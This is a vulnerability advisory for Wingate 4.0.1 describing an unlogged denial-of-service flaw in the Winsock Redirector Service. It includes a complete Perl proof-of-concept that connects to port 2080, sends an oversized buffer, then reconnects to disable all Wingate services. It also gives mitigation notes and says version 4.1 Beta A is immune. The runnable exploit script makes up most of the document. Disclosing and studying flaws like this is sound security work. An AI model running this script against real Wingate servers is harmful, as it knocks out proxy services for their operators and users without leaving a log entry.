COMMAND

    WinGate

SYSTEMS AFFECTED

    Wingate 4.0.1

PROBLEM

    Blue Panda found  following.  The  Wingate engine can  be disabled
    by sending an abnormal  string to the Winsock  Redirecter Service.
    The attack is not logged.

    Proof of concept:

    #!/usr/bin/perl
    #
    # wgate401.pl - Wingate 4.0.1 denial-of-service
    # Blue Panda - bluepanda@dwarf.box.sk
    # http://bluepanda.box.sk/
    #
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    # Causes all Wingate services to become unavailable until the Wingate Engine
    # is restarted. The Winsock Redirector Service must be enabled in order for
    # this to work. Tested on the evaluation version of Wingate Pro 4.0.1.
    #
    
    use IO::Socket;
    
    $host = "host.com";
    $port = "2080";
    $sleepfor = 1;
    
    print "Wingate 4.0.1 denial-of-service
    Blue Panda - bluepanda\@dwarf.box.sk
    http://bluepanda.box.sk/
    
    ----------------------------------------------------------
    Disclaimer: this file is intended as proof of concept, and
    is not intended to be used for illegal purposes. I accept
    no responsibility for damage incurred by the use of it.
    ----------------------------------------------------------
    
    Causes all Wingate services to become unavailable until the Wingate Engine
    is restarted. The Winsock Redirector Service must be enabled in order for
    this to work.\n\n";
    
    # Connect to the Winsock Redirector Service.
    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
    print "done.\n";
    
    # Send some characters to the Winsock Redirector Service.
    $buffer = "a" x 1079;
    print $socket "$buffer";
    
    # Wait a few seconds.
    $counter = 0;
    print "Sleeping for $sleepfor seconds.";
    while($counter < $sleepfor) {
            sleep(1);
            print ".";
            $counter += 1;
    }
    print "\n";
    
    # Close the connection. The Winsock Redirector Service should now be
    # disabled.
    close($socket);
    
    # Connect once more to the Winsock Redirector Service. This will disable all
    # other services.
    print "Connecting to $host:$port...";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
    print "done.\n";
    
    # Finished.
    close($socket);

    For  normal  use  it  is  not  too  serious a vulnerability as the
    Winsock Redirector Service is by  default only bound to the  local
    network adaptors  and there  is no  point in  binding it to public
    (internet)  adaptors,  meaning  that  the  attack would have to be
    launched from within  the LAN. GateKeeper  will warn the  operator
    when they bind the Winsock Redirector Service to a public adaptor.

    Of course  this could  only be  performed inside  a Wingate system
    (unless the operator bound the winsock redirector to the  external
    IP address which is a no-no).

SOLUTION

    Immune: Wingate 4.1 Beta A